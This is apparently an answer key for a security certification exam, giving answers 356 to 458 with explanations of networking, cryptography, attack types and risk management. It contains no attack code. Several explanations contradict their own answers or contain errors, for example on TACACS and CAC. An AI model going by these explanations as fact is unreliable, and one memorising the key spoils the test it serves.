A gray hat hacker uses her skills for both altruistic and malicious purposes, breaking into and exploiting a system without permission, but without sharing that information with others.
A black box tester is someone who tests a system without any prior knowledge of the network or infrastructure; this person tests the system with the owner’s permission.
A white hat hacker uses her skills to assist in securing systems; this type of hacker is usually a penetration testing professional or ethical hacker.

Answer 356

A

Blacklisting

Correct Answer:
Blacklisting allows you to restrict users from installing and executing certain applications on their mobile devices.
Incorrect Answers:
Whitelisting allows an administrator to determine which applications and other software the user is allowed to install and execute.
Containerization is a technique used to separate different sensitivities of data, such as corporate and personal data, on a mobile device.
Sandboxing separates applications from each other and does not allow them to share execution, user, or data space.

Answer 357

A

Integer overflow attack

Correct Answer:
An integer overflow attack is similar to a buffer overflow attack and results in mathematical operations that the host or application cannot handle, causing them to fail.
Incorrect Answers:
A SQL injection attack targets relational databases that reside behind Web applications.
An LDAP injection attack targets directory services databases, such as those used in X.500 implementations.
A directory traversal attack targets non-secure directory structures on the host, such as folder structures.

Answer 358

A

Change the “public” community name.

Correct Answer:
Changing the community name for SNMP is the single most important thing you can do to ensure that any user cannot access your SNMP device.
Incorrect Answer:
A firewall will not help protect the clients.
Disabling SNMP on the client will cripple the SNMP functionality, and ICMP is unrelated.

Answer 359

A

Documentary evidence

Correct Answer:
Documentary evidence directly supports or proves a definitive assertion.
Incorrect Answers:
Exculpatory evidence proves innocence.
Inculpatory evidence proves guilt.
Demonstrative evidence, which can be in the form of charts, graphs, drawings, and so forth, is used to help nontechnical people, such as the members of a jury, understand an event.

Answer 360

A

COBO

Correct Answer:
Company Owned, Business Only (COBO) devices are owned and controlled completely by the organization.
Incorrect Answers:
Bring your own device (BYOD) means the employee owns the device.
Choose your own device (CYOD) means the organization retains ownership, but employees may install personal apps on the device.
Company-issued, personally-enabled (COPE) is similar to CYOD, but employees are limited to installing only white-listed apps.

Answer 361

A

WEP

Correct Answer:
WEP is a legacy wireless encryption protocol that has been determined to be very weak and easily broken. It uses the RC4 streaming protocol and weak initialization vectors (24-bit) to encrypt data on wireless networks.
Incorrect Answers:
WPA2 is an advanced encryption protocol that uses AES.
WPA was an interim protocol used to correct some of WEP?s weaknesses. It uses the TKIP protocol.
802.1X is a port-based authentication method, not a wireless encryption protocol.

Answer 362

A

SQL injection

Correct Answer:
SQL injections insert unanticipated SQL commands to try to break the application.
Incorrect Answers:
MySQL is one of many forms of SQL tools.
Relational injection and Hierarchical injection are nonsense terms.

Answer 363

A

Type II error
The error caused when an unauthorized user is validated as authorized

Correct Answers:
A false acceptance rate (FAR) is the error caused when an unauthorized user is validated as authorized; it is also referred to as a Type II error.
Incorrect Answers:
A false reject rate (FRR) is the error caused from rejecting an authorized user; it is also called a Type I error.

Answer 364

A

CAC card

Correct Answer:
CAC (common access control) card. RSA is a popular asymetric encryption.
Incorrect Answers:
HOTP (HMAC-based one-time password) is an algorithm used to generate one-time passwords and a physical access control (PAC) describes the mechanisms for admitting and denying user access to your space.

Answer 365

A

Watering hole attack

Correct Answer:
A watering hole attack is designed to compromise a site that certain users are likely to use, rewarding them with malware for their visit.
incorrect Answers:
The other attacks are incorrect because they are not valid attacks in this situation.

Answer 366

A

TACACS encrypts only passwords between the client and server.

Correct Answer:
TACACS encrypts all information between the client and server, whereas RADIUS only encrypts the passwords.
Incorrect Answers
All of these are accurate descriptions of differences between RADIUS and TACACS.

Answer 367

A

Sue’s public key

Correct Answer:
Sue’s public key is used to encrypt a message from Bob to Sue, as only Sue’s private key can decrypt it.
Incorrect Answers:
Sue’s private key can only decrypt the message, and Bob does not possess it.
Neither of Bob’s keys can be used to encrypt a confidential message to Sue.

Answer 368

A

Smartcard and PIN

Correct Answer:
The use of a smartcard and PIN involves the use of two factors: something you have and something you know.
Incorrect Answers:
All of the other answers involve the use of only one factor: something you are or something you know, but not used together.

Answer 369

A

hosts

Correct Answer:
The hosts file on a local machine provides for fully qualified domain name (FQDN) resolution in the absence of DNS and can be used to redirect users to the wrong web site.
Incorrect Answers:
The lmhosts file is a Windows-specific file that maps computer names to IP addresses.
The services file lists well-known services, such as HTTP and FTP.
The ARP cache contains recently resolved local network IP addresses to MAC addresses.

Answer 370

A

netstat

Correct Answer:
netstat is a tool found on both Unix/Linux and Windows hosts that can give network statistics and connection information, including port usage. This would help determine if a host is listening on an unexpected or unwanted port.
Incorrect Answers:
None of the other choices give information on open ports.
nbtstat is a command found only on Windows hosts and gives NetBIOS usage information.
Ping is found on both Unix/Linux and Windows hosts but only sends simple ICMP requests to a host.
ifconfig is found only on Unix and Linux hosts and only gives network interface configuration information.

Answer 371

A

SHA-1

Correct Answer:
SHA-1 (secure hashing algorithm) generates a 160-bit hash.
Incorrect Answers;
MD5 is a hashing algorithm that generates a 128-bit hash, which is weaker than SHA-1.
3DES and AES-256 are symmetric encryption algorithms, not hashing algorithms.

Answer 372

A

Threat

Correct Answer:
A threat is defined as an entity or event that has the potential to cause harm or damage to an asset. A threat could cause the organization to suffer a financial loss.
Incorrect Answers:
Risk is the possibility that a threat could harm an asset.
A vulnerability is a weakness in the system.
A loss is what damage occurs when a vulnerability is exploited by a threat.

Answer 373

A

Brute force

Correct Answer:
A brute-force attack is typically a password attack. It may be used separately to break wireless passwords but is not unique to wireless attacks.
Incorrect Answers:
All of these are attack methods that a rogue access point could attempt to engage in, resulting in a denial-of-service condition on the wireless network (as in the case of intentional interference), or by spoofing valid access points to entice an unsuspecting client to connect to it.

Answer 374

A

500

Correct Answer:
IKE uses UDP port 500.
Incorrect Answers:
Port 443 is used by SSL, 22 is used by SSH, and 8080 does not fall into the range of well-known ports (0?1023) but is frequently used by proxy servers and other security devices.

Answer 375

A

Firewalls and other security devices are not required.

Correct Answer:
Even when using NAT, firewalls and security devices are required on a network boundary.
Incorrect Answers:
All of these are advantages to using NAT.

Answer 376

A

HIDS

Correct Answer:
A host-based intrusion detection system (HIDS) monitors local system activity and logs for indications of an attack.
Correct Answers:
A NIDS is a network-based intrusion detection system and does not monitor host log files.
A NIPS is a network-based intrusion prevention system and works on the network instead of the host.
An ACL is an access control list and is used to allow or deny traffic through a router or grant/deny permissions to resources.

Answer 377

A

Validate the input into a web site for illegal characters in a particular field

Correct Answer:
Validating the input into a web site form for illegal characters in a field is the best choice for preventing cross-site scripting (XSS) attacks.
Incorrect Answers:
Blocking ports 443 and 80 will make the site unusable, as these are the typical ports used to access web sites.
Requiring certificate-based authentication will not prevent cross-site scripting attacks and is an unnecessary measure.
CGI is not a method used for cross-site scripting attacks.

Answer 378

A

L2TP

Correct Answer:
IPSec provides encryption services for L2TP when used in a VPN implementation.
Incorrect Answers:
None of these protocols use IPSec for encryption services.

Answer 379

A

Smurf attack

Correct Answers:
A smurf attack is a type of ICMP attack where large amounts of ping packets are sent from a spoofed IP address on the network to the network broadcast address, causing many replies back to the victim and possibly bringing about a denial of service. A smurf attack is an example of a DDoS attack.
Incorrect Answers:
A remote access Trojan (RAT) is malicious software that the user typically installs without knowing it, such as by installing a game from the Internet or by running a program that was e-mailed to them that is malicious software. The RAT program then opens a back door for the hacker to gain access to the system remotely at a later time.
A botnet is a group of compromised systems that the hacker has control over and uses to attack a victim’s system.
A watering hole attack is when the hacker determines sites you may want to visit and then compromises those sites by planting viruses or malicious code on them. When you visit the site (which you trust), you are then infected with the virus.

Answer 380

A

Bluebugging

Correct Answers:
Bluebugging, the most serious of the various Bluetooth attacks, involves an attacker attempting to take control of or use a Bluetooth-enabled cell phone to place calls.
Incorrect Answers:
Bluejacking is the act of sending unsolicited messages or files to a Bluetooth device.
Bluesnarfing is a more serious attack than Bluejacking and involves unauthorized access to information on a Bluetooth-enabled device.
Bluesniffing is a false, nonexistent term.

Answer 381

A

Kerberos

Correct Answer:
Kerberos uses a key distribution center (KDC), which consists of an authentication server and a ticket-granting service.
Incorrect Answers:
None of these choices is associated with these terms.

Answer 382

A

Identification

Correct Answer:
Identification is the first step in the process and involves the user presenting his or her credentials to the server.
Incorrect Answers:
Authentication occurs after identification and involves the user?s credentials being authenticated by the server.
Authorization refers to granting an authenticated user the correct access to an object.
Impersonation is an invalid term in this context.

Answer 383

A

Switch

Correct Answer:
Switches natively help reduce collision domains and, when VLANs are implemented on them, help reduce broadcast domains.
Incorrect Answers:
Routers can help reduce or eliminate broadcast domains, and bridges can help reduce collision domains, but neither of these devices use VLANs.
Hubs do not reduce collision or broadcast domains.

Answer 384

A

Rootkit

Correct Answer:
A rootkit is very difficult to detect and often replaces key operating system files with compromised versions, allowing an attacker to access administrative-level functions.
Incorrect Answers:
A worm is a self-propagating piece of malware that can spread without user intervention.
A Trojan is a piece of malware that disguises itself as useful software.
A logic bomb is a malicious script that typically activates after a certain date or event.

Answer 385

A

VLAN

Correct Answer:
VLANs (virtual LANs) provide for local area network segmentation and separation and are implemented on switches.
Incorrect Answers:
RADIUS is a remote access authentication technology.
Virtualization refers to the creation and management of virtual hosts running in a virtualized environment.
VPN is a secure remote access technology.

Answer 386

A

Fuzzing

Correct Answer:
Fuzzing is an application vulnerability testing technique that sends invalid or unexpected data to the application, with the intent to see if any security vulnerabilities exist.
Incorrect Answers:
Cracking typically involves passwords, not applications.
Scanning usually means network port or service scanning.
Spoofing means to masquerade as another entity, usually by spoofing an IP address, MAC address, or user.

Answer 387

A

Passwords must include the userid.

Correct Answer:
Passwords should not be created that includes the user’s userid.
Incorrect Answers:
All of these practices contribute to a secure password.

Answer 388

A

RAM

Correct Answer:
RAM is the most volatile source of information and is easily lost. It must be collected first during a computer forensics investigation.
Incorrect Answers:
The order of volatility, and order of evidence collection, is RAM, swap file, hard disk, and CD/DVDs.

Answer 389

A

SQL injection

Correct Answer:
SQL injection is a common attack on databases through a web-based form, where the attacker injects SQL commands into the form input.
Incorrect Answers:
Cross-site scripting allows client-side scripts to be run on a web site.
XML injection is an attack that injects faulty or malicious XML code into an XML statement.
Directory traversal is the ability to search a web server?s directories and files.

Answer 390

A

NAC

Correct Answer:
Network access control (NAC) can be used to enforce logon or connection banners that will require users to agree to terms of use before being allowed to connect to the network.
Incorrect Answers;
None of these other technologies can be used to enforce logon warning banners requiring users to agree to terms of use before being allowed to access the network.

Answer 391

A

Fewer systems to physically secure

Correct Answer:
Virtualization results in fewer physical systems (and less hardware) that must be secured.
Incorrect Answers:
None of the other choices offer any benefits, security or otherwise, of virtualization.

Answer 392

A

TLS

Correct Answer:
Transport Layer Security (TLS) is considered a strong replacement for SSL.
Correct Answers:
SSH is a secure replacement for Telnet and other nonsecure protocols.
AES is a symmetric algorithm that replaces DES.
RSA is an asymmetric algorithm used in public key cryptography.

Answer 393

A

Cross-site scripting

Correct Answer:
Cross-site scripting (XSS) enables attackers to inject client-side scripts into web pages viewed by others.
Incorrect Answers:
XML injection occurs when malicious XML code is inserted into an XML statement.
SQL injection involves inserting faulty SQL input commands into a site that connects to a database, producing unintended results or returning privileged information.
A buffer overflow takes advantage of programming flaws that occur when data overwrites a program?s allocated memory address and enables arbitrary code to be executed in that address.

Answer 394

A

443

Correct Answer:
TCP port 443 must be opened on the firewall to allow SSL traffic to pass.
Incorrect Answers:
None of these ports are used by SSL.

Answer 395

A

Wireless network access by persons outside the building

Correct Answer:
Because of the placement near the outer wall, the wireless access point’s signals could be detected outside the building and could allow an unauthorized user to eavesdrop on or use the connection.
Incorrect Answers:
Damage due to falling is a concern, but not the most immediate security concern. Interference could happen only if other wireless devices are nearby that transmit on frequencies close to the one that the access point uses.
This is a performance concern, but not typically a security concern unless it is malicious in nature and seeks to cause a denial-of-service condition.
Signal degradation for the rest of the facility would not be caused by the placement of the access point next to the outer wall.

Answer 396

A

MS-CHAP

Correct Answer:
Microsoft CHAP (MS-CHAP) uses Microsoft Point-to-Point Encryption (MPPE) protocol to encrypt all traffic from the client to the server.
Incorrect Answers:
Neither EAP nor Kerberos uses MPPE.
CHAP is the nonproprietary version and uses MD5 as its hashing algorithm.

Answer 397

A

Offline password audit

Correct Answer:
If the goal is to prevent user account lockout, then offline password auditing is the correct method.
Incorrect Answers:
Online auditing would definitely lock out user accounts as soon as the account lockout threshold is reached.
An account lockout audit is an invalid type of audit, and a white-box penetration test involves full system or network testing and is incorrect in this context.

Answer 398

A

Private key

Correct Answer:
The private key, when used for nonrepudiation, is used to encrypt text that anyone who possesses the public key can decrypt. This assures that only the person owning the private key could have encrypted it, ensuring that he or she is the one who performed the action.
Incorrect Answers:
Used in this scenario, this does not guarantee confidentiality, but it does provide for nonrepudiation.
Symmetric keys and hashes do not provide for nonrepudiation, because they cannot be used to guarantee who sent a message or performed an action.
Public keys can be in the possession of anyone and are used in this case to verify that the private key was used to encrypt the text for nonrepudiation.

Answer 399

A

Vishing

Correct Answer:
Vishing (a combination of the terms voice and phishing) refers to social engineering attacks that make use of VoIP systems to spoof phone numbers, hide caller IDs, and so forth, to obtain personal or account information from unsuspecting users.
Incorrect Answers:
Phishing involves the use of e-mail targeted to users with a malicious web site link embedded in the e-mail.
Whaling involves specifically targeting senior-level executives of an organization for social engineering attacks.
VoIP hijacking is a nonexistent term in this context.

Answer 400

A

Integrity

Correct Answer:
Integrity is concerned with ensuring that data is not modified.
Incorrect Answers:
Confidentiality protects information from unauthorized access.
Availability provides for information and systems to be online and ready for users at any time.
Nonrepudiation means that a user cannot deny that he or she took an action.

Answer 401

A

Users must wait a certain amount of time before they are allowed to change passwords.

Correct Answer:
A minimum password age requires that users must wait a certain amount of time before they are allowed to change passwords.
Incorrect Answers:
A maximum password age setting requires that users must change passwords after a certain amount of time.
Passwords are typically good only for a certain amount of time, not through a certain date.
Passwords typically cannot be reused until a certain number of password changes have occurred, preventing the use of the last specified number of passwords.

Answer 402

A

Mutual authentication

Correct Answer:
Mutual authentication requires both sides of a communications session to authenticate to each other.
Incorrect Answers:
Single sign-on (SSO) is a concept that provides for one authentication to be used for multiple resources.
Nonrepudiation ensures that a party cannot deny that it took an action.
Hashing involves a one-way function that produces a message digest from a piece of text.

Answer 403

A

AES
3DES

Correct Answers:
AES and 3DES are considered encryption standards and use symmetric algorithms.
Incorrect Answers:
SHA and MD5 are hashing algorithms, and RSA is an asymmetric algorithm.

Answer 404

A

Business impact analysis

Correct Answer:
The business impact analysis (BIA) is a critical first step in developing the business continuity plan (BCP). It involves determining what risks are present and their effects on the business and its assets.
Incorrect Answers:
The BCP is the overall and final product that the BIA contributes to. The BIA must be completed as one of the first steps, as it essentially is the risk assessment for the BCP.
The disaster recovery plan (DRP) concerns itself with recovering the assets and operations of the business immediately following a disaster.
A system backup plan is but one element of the DRP and may or may not be one of the first things accomplished for that plan.

Answer 405

A

Honeypot

Correct Answer:
A honeypot is a host that has been left with some vulnerabilities open to lure a hacker away from attacking the network and to observe his or her attack methods.
Incorrect Answers:
A bastion host is a secure host outside the network.
An intrusion detection system (IDS) is used to detect network attacks.
An intrusion prevention system (IPS) is used to detect attacks and attempt to prevent them by rerouting traffic, blocking ports, etc.

Answer 406

A

Bypass security controls

Correct Answer:
Rogue wireless routers could be used by unauthorized individuals to access the network and bypass security controls such as firewalls.
Incorrect Answers:
These issues may affect performance and can be important to security, but do not have a direct impact on securing the wireless network.

Answer 407

A

Anything that is not specifically allowed is denied by default.

Correct Answer:
Anything that is not specified as allowed is typically denied, with no deny rules necessary.
Incorrect Answers:
It is implicitly denied, versus explicitly denied.
These statements would describe an explicit deny, an explicit allow, and an implicit allow, respectively.

Answer 408

A

Documentary evidence

Correct Answer:
Documentary evidence is usually a printed form of evidence, a recording, or photograph.
Incorrect Answers:
Real (or physical) evidence is a tangible object presented in court (such as a weapon).
Direct evidence is testimony from someone who actually witnessed the event.
Demonstrative evidence is presenting a physical object that displays the results of an event that occurred.

Answer 409

A

False rejection rate

Correct Answer:
A false rejection rate (FRR) is a Type I error in biometrics.
Incorrect Answers:
This also equates to a false negative.
A false acceptance rate (FAR) is a Type II error and referred to sometimes as a false positivve.
The crossover error rate (CER) is the point where the FRR and FAR are equal.

Answer 410

A

Risk elimination

Correct Answer:
Risk can never be completely eliminated, only dealt with.
Incorrect Answers:
These are all valid 5.0 Risk Management strategies.

Answer 411

A

SSH

Correct Answer:
Secure Shell (SSH) is considered a secure replacement for Telnet.
Incorrect Answers:
TLS and SSL are secure session protocols used in HTTPS traffic.
RLOGIN is an older, nonsecure protocol.

Answer 412

A

VPN concentrator

Correct Answer:
A VPN concentrator serves as a centralized authentication point for virtual private network connections.
Incorrect Answers:
None of these devices are used to provide centralized authentication services for secure remote access connections.

Answer 413

A

Insurance

Correct Answer:
Insurance is a method of risk transference where the organization pays a premium for the insurance company to assume the risk. If a disaster or event occurs, the organization is paid for its losses.
Incorrect Answers:
Separation of duties transfers key duties to another individual but does not transfer the risk away from the organization.
A service-level agreement between two parties specifies levels of service and support, but the organization still maintains risk.
An alternate site is used to transfer operations from a primary site in the event of a disaster, but the risk is still borne by the organization.

Answer 414

A

Collision

Correct Answer:
A collision occurs when two pieces of plaintext are hashed and produce identical hashes.
Incorrect Answers:
A crossover error is a reference to biometric authentication factors.
Interference refers to wireless networks, and disruption is an invalid term in this context.

Answer 415

A

A fail-safe device responds by not doing anything to cause harm when the failure occurs.
A fail-secure device responds by making sure the device is using a secure state when a failure occurs.

Correct Answers:
A fail-safe device responds by not doing anything to cause harm when the failure occurs. A fail-secure device responds by making sure the device is using a secure state when a failure occurs.
Incorrect Answers:
The fail-secure answer is the definition of fail-safe, and the fail-safe answer is the definition of fail-secure, not the other way around.

Answer 416

A

Residual risk

Correct Answer:
Residual risk is what risk remains after all mitigation and reduction strategies have been implemented.
Incorrect Answers:
Low risk is a level that may be accepted without mitigation or requires little mitigation.
Accepted risk is what risk the management authority chooses to accept with or without mitigations in place.
Mitigated risk is that risk that has been reduced to a lower level.

Answer 417

A

Clustering

Correct Answer:
Although it is part of high availability design, clustering is not typically used in the design and implementation of a secure network architecture.
Incorrect Answers:
DMZs are used as a security buffer zone to separate internal networks and resources from externally accessible ones.
VLANs are used to segregate local networks, providing a secure internal infrastructure.
VPNs provide for secure remote access solutions.

Answer 418

A

At the bottom of the ruleset.

Correct Answer:
A “deny any-any” rule denies all traffic from all sources, so it should be the last rule in the ruleset.
Incorrect Answers:
Placement of the “deny-any-any” rule anywhere else in the ruleset would prevent any other rules that follow it from processing.

Answer 419

A

Protocol analyzer

Correct Answer:
In order to view network traffic, it must be sniffed or captured using a protocol analyzer (sometimes called a sniffer).
Incorrect Answers:
These devices cannot be used to capture and view network traffic.

Answer 420

A

Least privilege

Correct Answer:
The principle of least privilege allows users to have only the privileges necessary to perform their duties and no more.
Incorrect Answers:
Separation of duties requires critical roles to be split among personnel so no one user has the privileges to commit fraud or to abuse his or her role.
Role-based access control and discretionary access control are access control models.

Answer 421

A

Logic bomb

Correct Answer:
A logic bomb is a type of malware, usually very difficult to detect, that is designed to activate only after a specific time has passed or a specific date or event has occurred.
Incorrect Answers:
These other types of malware are not tied to specific dates or events.

Answer 422

A

Integrity

Correct Answer:
Integrity provides for detection of data modification.
Incorrect Answers:
Confidentiality deals with protecting data from unauthorized access, not modification.
Availability ensures data and systems are available to authorized users whenever needed.
Nonrepudiation involves preventing a user from denying that he or she performed an action.

Answer 423

A

System hardening

Correct Answer:
System hardening involves disabling unnecessary services and protocols on a host, as well as uninstalling software that is not needed.
Incorrect Answers:
System reduction, network hardening and application restriction are incorrect.
These are nonexistent terms used as distractors.

Answer 424

A

CRL

Correct Answer:
The certificate revocation list (CRL) is used to identify invalid certificates.
Incorrect Answers:
A CAL is a client access license.
PKS is a cryptographic file standard, and a CA is a certificate authority, which issues certificates.

Answer 425

A

Faraday cage

Correct Answer:
A Faraday cage can be used to shield devices from sending or receiving electronic signals.
Incorrect Answers:
A protocol analyzer is used to capture and view network traffic.
A spectrum analyzer is used for site surveys when designing wireless networks.
A signal reducer is not a device used in this context.

Answer 426

A

Obtain permission for the test

Correct Answer:
Before beginning any type of penetration test or vulnerability assessment, you must first obtain permission from the responsible system owner to avoid legal or liability issues.
Incorrect Answers:
Although these are all valid steps to take during a penetration test or vulnerability assessment, none of these should be started without obtaining permission from the responsible system owner.

Answer 427

A

443

Correct Answer:
TCP port 443 is used by HTTPS protocol, which uses SSL as its secure session protocol. Both are associated with port 443.
Incorrect Answers:
Port 80 is used by HTTP, port 22 by SSH, and port 8080 by some proxy server implementations.

Answer 428

A

Back doors

Correct Answer:
Back doors are a security risk due to the possibility that an attacker could use them to gain unauthorized access to the program.
Incorrect Answers:
All of these are considered secure coding and application development practices.

Answer 429

A

Hot site

Correct Answer:
A hot site is an alternate processing site that can function almost immediately after a disaster and has equipment and data prepositioned, as well as full utilities.
Incorrect Answers:
Cold sites have only space and utilities available and take longer to activate.
Warm sites have space, utilities, and possibly some equipment and furniture, but still need equipment, personnel, and data transferred, so they cannot be activated instantly.
Reciprocal sites are alternate locations provided by and in agreement with another organization and are typically co-located with that organization.

Answer 430

A

Mantrap

Correct Answer:
A mantrap, an area between two locked doors from which the second door cannot be opened until the first door is locked, is designed to allow only one person at a time to enter a facility, effectively preventing tailgating.
Incorrect Answers:
Separation of duties and least privilege are two security principles designed to prevent collusion and elevated privileges, respectively.
Multifactor authentication is designed to positively identify and authenticate an individual but does not prevent tailgating.

Answer 431

A

Host-based firewall

Correct Answer:
A host-based firewall should be used when connecting to untrusted networks, such as one in a hotel.
Incorrect Answers:
Having an unencrypted drive and null password are not security recommendations.
Although full disk encryption (FDE) can help if the laptop is lost or stolen, it will not help you in situations when you are making connections to an unknown and potentially unsecure network.
You could potentially be infected with a virus by connecting to an unknown network without having a firewall enabled, or be vulnerable to an attack.

Answer 432

A

NAC

Correct Answer:
Network access control (NAC) can be used to prevent hosts from connecting to the network unless they meet certain security requirements, such as patch level, up-to-date antivirus signatures, and so forth.
Incorrect Answers:
None of these other technologies are concerned with enforcing host security requirements prior to connecting to the network.

Answer 433

A

A hardware module that performs cryptographic functions

Correct Answer:
A Trusted Platform Module (TPM) is a hardware device, usually in the form of an embedded chip, that performs cryptographic functions, such as encrypting an entire hard drive.
Incorrect Answers:
None of these are valid choices to describe a Trusted Platform Module.

Answer 434

A

Certificate revocation list

Correct Answer:
A certificate revocation list (CRL) contains a list of all invalid or revoked certificates.
Incorrect Answers:
A certificate denial list and certificate invalidation list are false choices and do not exist.
A certificate authority is responsible for issuing certificates.

Answer 435

A

Maximum tolerable downtime (MTD)

Correct Answer:
The maximum tolerable downtime (MTD) indicates how long an asset may be down or offline without seriously impacting the organization.
Incorrect Answers:
The mean time between failures is an estimate of how long a piece of equipment will perform before failure.
The recovery point objective and recovery time objective refer to how much data may be lost during a failure or disaster and the maximum amount of time it must take to recover the system or data, respectively, before the organization is seriously impacted.

Answer 436

A

Message digest

Correct Answer:
A message digest, or hash, can be used to verify the integrity of a message by comparing the original hash to one generated after receipt of the message. If the two match, then integrity is assured. If they do not match, then the message was altered between transmission and receipt.
Incorrect Answers:
Digital certificates contain public keys that are distributed to users.
Digital signatures provide for authentication.
Symmetric keys are not used to provide for integrity, but confidentiality.

Answer 437

A

Malware

Correct Answer:
Malware is a security issue, but not specific to any applications.
Incorrect Answers:
All of these are potential application security issues that could affect both web-based and client-server applications.

Answer 438

A

Opening unused ports

Correct Answer:
Opening unused ports would increase the attack surface on a host. Closing unused ports is considered a good hardening practice.
Incorrect Answers:
All of the other choices are considered good security measures to use when hardening a host.

Answer 439

A

Remote wiping

Correct Answer:
Remote drive or disk wiping is used to ensure data protection and confidentiality on a mobile device in the event it is lost or stolen.
Incorrect Answers:
Remote destruction and remote encryption are invalid terms in this context.
Remote access enables a remote user to authenticate to and access an organization’s private network.

Answer 440

A

Blue box

Correct Answer:
Blue box testing is not a type of penetration testing.Black box testing involves a penetration test where the test team has no knowledge of the network.
Incorrect Answers:
In gray box testing, the tester may have some knowledge given to them, such as an infrastructure diagram or IP address list. I
n a white box test, the test team has full and detailed knowledge of the network, its design, functions, and applications.

Answer 441

A

WEP

Correct Answer:
WEP (Wired Equivalent Privacy) uses a faulty implementation of the RC4 protocol, in addition to weak initialization vectors, making it an unsecure wireless protocol and as a result should never be used.
Incorrect Answers:
None of these other protocols use RC4.

Answer 442

A

Acceptable usage policy

Correct Answer:
An acceptable use policy (AUP) defines what users may and may not do with regard to information systems, including e-mail.
Incorrect Answers:
These policies apply to a wide range of security issues but do not define what actions users may perform on information systems.

Answer 443

A

ARP poisoning

Correct Answer:
ARP poisoning involves introducing false entries into the host’s ARP cache, essentially spoofing MAC addresses.
Incorrect Answers:
DNS poisoning involves introducing false entries into a DNS server’s cache or its zone files.
DHCP and VLAN poisoning are invalid answers.

Answer 444

A

SMTP, port 25

Correct Answer:
Simple Mail Transport Protocol (SMTP) uses TCP port 25 and is used to send e-mail and should not be running on an Internet-facing server that only provides a web site.
Incorrect Answers:
HTTP (port 80) must be allowed to run on the server to provide web content to users.
SMTP uses port 25, not port 110. Port 110 is used by POP3 to receive e-mail messages.
HTTPS uses port 443, not HTTP.

Answer 445

A

Public key

Correct Answer:
Bob’s public key is used to encrypt a message for him. Bob would then decrypt the message with his private key.
Incorrect Answers:
Symmetric keys and hashes are not used to encrypt a message to an individual in a PKI environment.
The private key would be used to decrypt, not encrypt, the message in this scenario.

Answer 446

A

Implement MAC filtering

Correct Answer:
MAC address filtering, although not an effective security measure by itself, can be used to limit which clients, by hardware address, can connect to the wireless network.
Incorrect Answers:
WEP is a wireless security protocol.
NAC prevents clients from connecting that do not meet specified security requirements, such as patch level or antivirus signature.
SSID cloaking merely prevents potential wireless clients from seeing the wireless network name by stopping it from being broadcast.

Answer 447

A

Iris scan

Correct Answer:
Out of the choices given, an iris scan is the strongest method of authentication, as these patterns are very unique to individuals. Of all of the biometric authentication methods, including voiceprint and fingerprints, iris scans are most accurate.
Incorrect Answers:
Username and password combinations are not considered strong methods of authentication, as would be a PIN by itself.
These are all considered single-factor forms of authentication.
Fingerprints are not considered as strong a method of biometric authentication as iris scans.

Answer 448

A

Users should have a normal user account for routine tasks, and an administrative account for tasks that require higher privileges.

Correct Answer:
Users should have a normal user account for routine tasks, and an administrative account for tasks that require higher privileges.
Incorrect Answers:
None of these choices are considered to be good security practices.
User accounts should not be directly granted administrative privileges, and ordinary user-level accounts should not be placed in the Administrators group.
Additionally, no one should be given the Domain Administrator’s username and password to use on a routine basis.

Answer 449

A

RAID

Correct Answer:
Redundant Array of Independent Disks (RAID) is used to provide for fault tolerance and recovery against disk failures.
Incorrect Answers:
Striping is used to improve performance but offers no fault tolerance unless used with parity bits.
Clustering is used to provide server fault tolerance.
Network load balancing is used to enhance network performance through balancing network traffic among servers.

Answer 450

A

Role-based access control

Correct Answer:
Role-based access control grants access to groups performing specific functions, or roles, but not to individuals.
Incorrect Answers:
Discretionary access control allows data owners/creators to grant access to individuals or groups.
Mandatory access control permits only administrators to grant access, based upon security labels.
Rule-based access control grants access to resources based upon specific rules associated with the resource.

Answer 451

A

DNS poisoning

Correct Answer:
DNS poisoning involves introducing false entries into a DNS server’s zone file, or a server’s hostname-to-IP address cache, both with the intent of misdirecting a DNS resolution request to a different server or site.
Incorrect Answer:
ARP poisoning involves introducing false entries into a host’s ARP cache, which maps MAC addresses to IP addresses.
DHCP poisoning is a false term, although there are several known DHCP network attacks.
Session hijacking involves intercepting and taking over an in-progress communications session between two hosts.

Answer 452

A

Password sharing

Correct Answer:
Password sharing typically will be in the acceptable use policy (AUP), as a directive to users about what they can and cannot do.
Incorrect Answers:
Password history, aging, and complexity will all typically be found in a password policy, as technical elements that describe how passwords should be constructed, implemented, and managed by administrators.

Answer 453

A

ARP

Correct Answer:
Address Resolution Protocol (ARP) resolves IP addresses to MAC addresses.
Incorrect Answers:
RARP, the Reverse Address Resolution Protocol, resolves MAC addresses to IP addresses’ the exact opposite of ARP.
DNS, the Domain Name System, resolves fully qualified domain names (FQDN) to IP addresses.
DHCP, the Dynamic Host Configuration Protocol, dynamically issues IP addressing information to hosts.

Answer 454

A

Penetration test

Correct Answer:
A penetration test is considered an active test because you are actually interacting with the target system and trying to bypass the security controls.
Incorrect Answers:
A vulnerability scan is considered a passive test because it only involves reviewing the configuration of a system to determine if there are any vulnerabilities.
A risk assessment helps identify risks for each asset.
A code review involves reviewing the code of an application to look for flaws.

Answer 455

A

Integer overflow attack
OBJ-1.3: Integer overflows and other integer manipulation vulnerabilities frequently result in buffer overflows. An integer overflow occurs when an arithmetic operation results in a large number to be stored in the space allocated for it. Integers are stored in 32 bits on the x86 architecture; therefore, if an integer operation results in a number greater than 0xffffffff, an integer overflow occurs, as was the case in this example. SQL injection is an attack that injects a database query into the input data directed at a server by accessing the application’s client-side. Password spraying is a type of brute force attack in which multiple user accounts are tested with a dictionary of common passwords. Impersonation is the act of pretending to be another person or system for fraud.

Answer 456

A

Items classified by the system as Low or as For Informational Purposes Only

OBJ-1.7: When conducting a vulnerability scan, it is common for the report to include some findings that are classified as “low” priority or “for informational purposes only.” These are most likely false positives and can be ignored by the analyst when starting their remediation efforts. “An HTTPS entry that indicates the web page is securely encrypted” is not a false positive but a true negative (a non-issue). A scan result showing a different version from the automated asset inventory should be investigated and is likely a true positive. A finding that shows the scanner compliance plug-ins are not up-to-date would likely also be a true positive that should be investigated.

Answer 457

A

Phishing
OBJ-1.1: This is an example of a phishing attack. Phishing is the fraudulent practice of sending emails and pretending to be from a reputable company to trick users into revealing personal information, such as passwords and credit card numbers. This email appears to be untargeted since it was sent to both customers and non-customers of this particular bank; it is best classified as phishing. Spear phishing requires the attack to be more targeted and less widespread.

Answer 458

A

Submit the files to an open-source intelligence provider like VirusTotal

